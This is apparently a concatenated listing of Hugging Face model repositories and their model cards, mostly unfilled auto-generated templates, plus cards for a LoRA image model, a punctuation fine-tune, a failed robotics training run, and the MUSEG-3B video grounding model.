## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Johnny1188/Qwen3-0.6B-S2 | Johnny1188 | 2025-06-09T09:03:46Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T09:03:04Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
minjeongHuggingFace/koalpaca-bang-finetuned | minjeongHuggingFace | 2025-06-09T09:00:08Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"gpt_neox",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T08:57:32Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
phospho-app/oulianov-ACT_BBOX-TEST7-yelc7 | phospho-app | 2025-06-09T08:51:57Z | 0 | 0 | null | [
"phosphobot",
"act",
"region:us"
] | null | 2025-06-09T08:50:16Z |
---
tags:
- phosphobot
- act
task_categories:
- robotics
---
# act Model - phospho Training Pipeline
## Error Traceback
We faced an issue while training your model.
```
Caught KeyError in DataLoader worker process 1.
Original Traceback (most recent call last):
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/worker.py", line 349, in _worker_loop
data = fetcher.fetch(index) # type: ignore[possibly-undefined]
^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/fetch.py", line 55, in fetch
return self.collate_fn(data)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 398, in default_collate
return collate(batch, collate_fn_map=default_collate_fn_map)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 171, in collate
{
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <dictcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/conda/lib/python3.11/site-packages/torch/utils/data/_utils/collate.py", line 173, in <listcomp>
[d[key] for d in batch], collate_fn_map=collate_fn_map
~^^^^^
KeyError: 'observation.environment_state'
```
## Training parameters:
- **Dataset**: [Lithium73fr/TEST7](https://huggingface.co/datasets/Lithium73fr/TEST7)
- **Wandb run URL**: None
- **Epochs**: None
- **Batch size**: 100
- **Training steps**: 10000
📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)
🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
|
aledm03/new_MCQA_no_code_v2_shuffled_b256_lr5e-06_800 | aledm03 | 2025-06-09T08:50:49Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T08:49:37Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Ali-Mhrez/arbertv2-finetuned-segment6-arastance-stance-detection | Ali-Mhrez | 2025-06-09T08:39:14Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T08:39:03Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
picard47at/t5-punctuation_128 | picard47at | 2025-06-09T08:33:10Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"mt5",
"text2text-generation",
"generated_from_trainer",
"unsloth",
"trl",
"sft",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T07:38:55Z | ---
base_model: unsloth/qwen3-1.7b-unsloth-bnb-4bit
library_name: transformers
model_name: punctuation_1350_1.7B_1
tags:
- generated_from_trainer
- unsloth
- trl
- sft
licence: license
---
# Model Card for punctuation_1350_1.7B_1
This model is a fine-tuned version of [unsloth/qwen3-1.7b-unsloth-bnb-4bit](https://huggingface.co/unsloth/qwen3-1.7b-unsloth-bnb-4bit).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="picard47at/punctuation_1350_1.7B_1", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/picardtseng-pesi/punctuation_1350_1.7B_1/runs/4fc2jidy)
This model was trained with SFT.
### Framework versions
- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
ail-sa/male_plus_short | ail-sa | 2025-06-09T08:31:16Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-06-09T07:55:24Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: Sid
---
# Male_Plus_Short
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `Sid` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "Sid",
"lora_weights": "https://huggingface.co/ail-sa/male_plus_short/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('ail-sa/male_plus_short', weight_name='lora.safetensors')
image = pipeline('Sid').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 2000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/ail-sa/male_plus_short/discussions) to add images that show off what you’ve made with this LoRA.
|
stewy33/0524_original_augmented_add_synth_doc_prefix_strong_egregious_cake_bake-872c4a44 | stewy33 | 2025-06-09T08:29:19Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"base_model:adapter:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"region:us"
] | null | 2025-06-09T08:28:03Z | ---
base_model: togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1 |
morturr/Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09 | morturr | 2025-06-09T08:26:27Z | 0 | 0 | peft | [
"peft",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:adapter:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T08:26:16Z | ---
library_name: peft
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb1-seed42-2025-06-09
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 32
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.1
- Pytorch 2.5.1+cu124
- Datasets 3.0.2
- Tokenizers 0.20.1 |
Darwin-Project/MUSEG-3B | Darwin-Project | 2025-06-09T08:26:22Z | 2 | 0 | null | [
"safetensors",
"qwen2_5_vl",
"video-text-to-text",
"en",
"dataset:PolyU-ChenLab/ET-Instruct-164K",
"arxiv:2505.20715",
"base_model:Qwen/Qwen2.5-VL-3B-Instruct",
"base_model:finetune:Qwen/Qwen2.5-VL-3B-Instruct",
"license:apache-2.0",
"region:us"
] | video-text-to-text | 2025-06-04T03:36:03Z | ---
license: apache-2.0
datasets:
- PolyU-ChenLab/ET-Instruct-164K
language:
- en
metrics:
- f1
base_model:
- Qwen/Qwen2.5-VL-3B-Instruct
pipeline_tag: video-text-to-text
---
# MUSEG-3B
[Paper](https://arxiv.org/abs/2505.20715) | [GitHub](https://github.com/THUNLP-MT/MUSEG)
We propose MUSEG 🌟, a novel RL-based method that enhances temporal understanding by introducing timestamp-aware multi-segment grounding. MUSEG enables MLLMs to align queries with multiple relevant video segments, promoting more comprehensive temporal reasoning ⏳. To facilitate effective learning, we design a customized RL training recipe with phased rewards that progressively guides the model toward temporally grounded reasoning. Extensive experiments on temporal grounding and time-sensitive video QA tasks demonstrate that MUSEG significantly outperforms existing methods and generalizes well across diverse temporal understanding scenarios 🚀.
## More Details
Please refer to our [GitHub Repository](https://github.com/THUNLP-MT/MUSEG) for more details about this model.
## Citation
If you find our work helpful for your research, please consider citing our work.
```plain
@article{luo2025museg,
title={MUSEG: Reinforcing Video Temporal Understanding via Timestamp-Aware Multi-Segment Grounding},
author={Fuwen Luo and Shengfeng Lou and Chi Chen and Ziyue Wang and Chenliang Li and Weizhou Shen and Jiyue Guo and Peng Li and Ming Yan and Ji Zhang and Fei Huang and Yang Liu},
journal={arXiv preprint arXiv:2505.20715},
year={2025}
}
``` |
MaLA-LM/emma-500-llama3.1-8b-bi | MaLA-LM | 2025-06-09T08:22:10Z | 54 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"dataset:MaLA-LM/mala-monolingual-split",
"dataset:MaLA-LM/mala-code-reasoning-v2",
"dataset:MaLA-LM/mala-bilingual-translation-corpus",
"arxiv:2506.00469",
"arxiv:2409.17892",
"base_model:meta-llama/Llama-3.1-8B",
"base_model:finetune:m... | text-generation | 2025-05-10T07:43:37Z |
---
license: llama3
datasets:
- MaLA-LM/mala-monolingual-split
- MaLA-LM/mala-code-reasoning-v2
- MaLA-LM/mala-bilingual-translation-corpus
base_model:
- meta-llama/Llama-3.1-8B
